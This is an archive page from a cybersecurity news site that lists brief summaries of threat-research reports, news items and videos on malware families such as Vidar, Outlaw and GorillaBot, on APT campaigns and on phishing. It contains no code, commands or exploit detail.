THREAT HUNTING Archives - Page 2 of 9 - Cybersecurity News Everyday

Agentic AI in the SOC – Dawn of Autonomous Alert Triage

Summary: This article explores the transformative power of Agentic AI in Security Operations Centers (SOCs), emphasizing its autonomy compared to traditional Assistant AI tools. It highlights how Agentic AI automates critical triage and investigation tasks, reducing analyst fatigue while improving operational efficiency and cost-effectiveness. The article also offers key considerations for evaluating Agentic AI solutions to enhance security operations.…

Threat Research

Vidar Stealer: Revealing A New Deception Strategy

April 7, 2025 admin

Vidar Stealer is a potent malware that has evolved over the years since its inception in 2018, targeting multiple platforms, especially the gaming sector. Recently, it was distributed through a game on Steam, exploiting the trust associated with popular software. Notably, the use of a legitimate tool, BGInfo, to cloak malicious activities represents a significant shift in attack strategies, emphasizing the need for vigilance in monitoring software integrity.…

Youtube

Learn Cybersecurity Defense!

April 5, 2025 Youtube

Summary: The video discusses a live training session for the Just Hacking community, highlighting new courses and features, including VPN support for accessing a new lab environment. The session introduces a special guest, Anton, who presents the “Constructing Defense” course, focusing on teaching cybersecurity principles through real-world scenarios and hands-on lab exercises.…

Cyber Security News

AustralianSuper, Rest, ART Among Victims in Widespread Superannuation Cyberattacks

April 4, 2025 CybersecurityNews

Summary: A series of cyberattacks have targeted some of Australia’s largest superannuation funds, compromising over 20,000 member accounts, with significant impacts reported by AustralianSuper and Australian Retirement Trust. In response, affected organizations have implemented immediate protective measures and are working closely with national authorities to secure member information.…

Threat Research

Unmasking EncryptHub: Help from ChatGPT & OPSEC Blunders

April 4, 2025April 4, 2025 iocOne

This article provides an in-depth exploration of EncryptHub, a rising cybercriminal, detailing his background, mistakes in operational security (OPSEC), and reliance on AI tools like ChatGPT in his malicious activities. The story reflects the duality of EncryptHub’s aspirations as a legitimate security researcher and his descent into cybercrime.…

Threat Research

Outlaw Linux Malware: Persistent, Unsophisticated, and Surprisingly Effective — Elastic Security Labs

April 4, 2025April 4, 2025 Securonix

OUTLAW is a persistent, auto-propagating coinminer that utilizes simple techniques such as SSH brute-forcing and modification of commodity miners for infection and persistence. By deploying a honeypot, researchers gained insights into how OUTLAW operates, revealing the malware’s ability to maintain control and expand its botnet with basic tactics.…

Threat Research

Analysis of Konni APT Campaign Impersonating the National Police Agency and the National Human Rights Commission

April 4, 2025April 4, 2025 iocOne

In recent spear-phishing attempts, the Konni APT has impersonated South Korean government entities such as the National Human Rights Commission and the National Police Agency to instigate fear of human rights violations and hacking incidents. The attacks utilize deception tactics to install malicious files, notably LNK shortcuts and AutoIT scripts.…

Youtube

Not-So-Secure Boot – Rob Allen – PSW #868

April 4, 2025 admin

Summary: The video discusses an interview with Rob Allen, Chief Product Officer at ThreatLocker, focusing on the integration of AI in security products and the challenges in the cybersecurity landscape. It addresses recent vulnerabilities in Microsoft systems and various security updates required to enhance protection against potential attacks.…

Threat Research

Threat actors leverage tax season to deploy tax-themed phishing campaigns

April 4, 2025 admin

As the tax season approaches in the U.S., Microsoft has noted an increase in phishing campaigns using tax-related themes to steal sensitive information and deploy malware. These campaigns exploit various techniques, including URL shorteners, QR codes, and legitimate file-hosting services to evade detection. The reported threats include credential theft linked to platforms like RaccoonO365 and various malware types such as Remcos and Latrodectus.…

Interesting Stuff

My book on Cyber Threat Intel, that never quite made it as a book, Chapter 1.1

April 3, 2025April 3, 2025 iocOne

This content explores the significance of Cyber Threat Intelligence (CTI) in improving organizational security and understanding the threat landscape. It delves into the motivations of various types of threat actors, their tactics, and how to effectively mitigate risks. The goal is to provide a comprehensive guide that enhances awareness and proactive measures against cyber threats.…

Threat Research

BYOVD Reloaded: Abusing a New Driver to Kill EDR

April 3, 2025April 3, 2025 iocOne

The article discusses a sophisticated ransomware attack involving Qilin ransomware, which utilizes the technique of bring-your-own-vulnerable-driver (BYOVD) to bypass traditional Endpoint Detection and Response (EDR) measures. The analysis uncovers the exploitation of a lesser-known driver, TPwSav.sys, in the context of a ransomware-as-a-service model. It emphasizes the vulnerabilities exploited, the attack chain, and the retaliation measures taken by Blackpoint’s Security Operations Center (SOC).…

Cyber Security News

The Reality Behind Security Control Failures—And How to Prevent Them

April 2, 2025 BleepingComputer

Summary: Many organizations face significant gaps between their expected and actual security control effectiveness, often realizing these deficiencies only after a breach occurs. Current traditional testing methods are inadequate for truly validating security measures, leading to blind spots that may not be uncovered until it’s too late.…

Threat Research

Salvador Stealer: New Android Malware That Phishes Banking Details & OTPs

April 2, 2025 AnyRun

The report discusses Salvador Stealer, a new Android malware posing as a banking application to steal sensitive user data, such as banking credentials and personal information. The malware employs phishing techniques and has multiple methods for exfiltrating data, including SMS interception and real-time communication with a Command and Control (C2) server via Telegram.…

Cyber Security News

Hackers Looking for Vulnerable Palo Alto Networks GlobalProtect Portals

April 2, 2025 CybersecurityNews

Summary: Threat actors are aggressively probing Palo Alto Networks GlobalProtect secure remote access instances, with over 24,000 unique IP addresses engaged in login scans, signaling a potential exploitation of vulnerabilities. The activity peaked between March 17 and March 26, primarily originating from the United States and Canada.…

Threat Research

SVC New Stealer on the Horizon

March 31, 2025March 31, 2025 Seqrite

SvcStealer 2025 is a sophisticated information-stealing malware delivered through spear phishing emails. It captures sensitive data from victims, including credentials and cryptocurrency wallet information, and sends it to a command and control (C2) server. With a focus on evading detection, it deletes traces of its activities and can potentially download additional malware.…

Threat Research

APT Silver Fox Utilizing Stock Investment Decoy and Undocumented Windows API to Evade Detection

March 30, 2025 AnalysisSpace

The article provides a detailed analysis of ValleyRAT, a remote access Trojan used by the Silver Fox threat organization. The malware employs various techniques, including deploying both a Trojan and a decoy PDF, to deceive victims while establishing a connection to a command and control server.…

Youtube

we’re hosting a conference

March 29, 2025 Youtube

Summary: The video discusses an upcoming online cyber security conference called Continuum con, which offers hands-on workshops focused on blue team cyber security defense. Unlike traditional conferences filled with dull presentations, attendees will actively engage in practical exercises across various topics, providing continuous education even after the conference ends.…

Threat Research

Lotus Blossom: New Sagerunex Backdoor Variants Are Targeting APAC Governments

March 28, 2025 Picussecurity

The Lotus Blossom, also known as Lotus Panda, is a sophisticated Chinese APT group involved in cyber espionage for over a decade. They have recently enhanced their tactics by deploying new Sagerunex backdoor variants that utilize third-party cloud services and social media for command-and-control activities. This article examines their tactics, techniques, and procedures, detailing their operational framework along with the challenges we face against such persistent threats.…

Interesting Stuff

Detecting Obfuscated PowerShell Attacks Using Sysmon and the ELK Stack

March 28, 2025March 28, 2025 iocOne

This article describes a lab project focused on detecting obfuscated PowerShell attacks using Sysmon, Winlogbeat, and the ELK stack. It highlights the challenges presented by attackers utilizing PowerShell and command-line obfuscation, aiming to provide defenders with hands-on experience in threat detection. The lab teaches students to recognize malicious activities, log telemetry, and utilize practical tools for cybersecurity defenses.…

Threat Research

GorillaBot: Technical Analysis and Code Similarities with Mirai

March 26, 2025 AnyRun

GorillaBot is a newly discovered Mirai-based botnet known for launching over 300,000 attacks in more than 100 countries. This botnet employs sophisticated evasion techniques and secure communication methods with its command-and-control servers. It presents a significant threat to various sectors, highlighting the urgent need for cybersecurity responses.…

Tag: THREAT HUNTING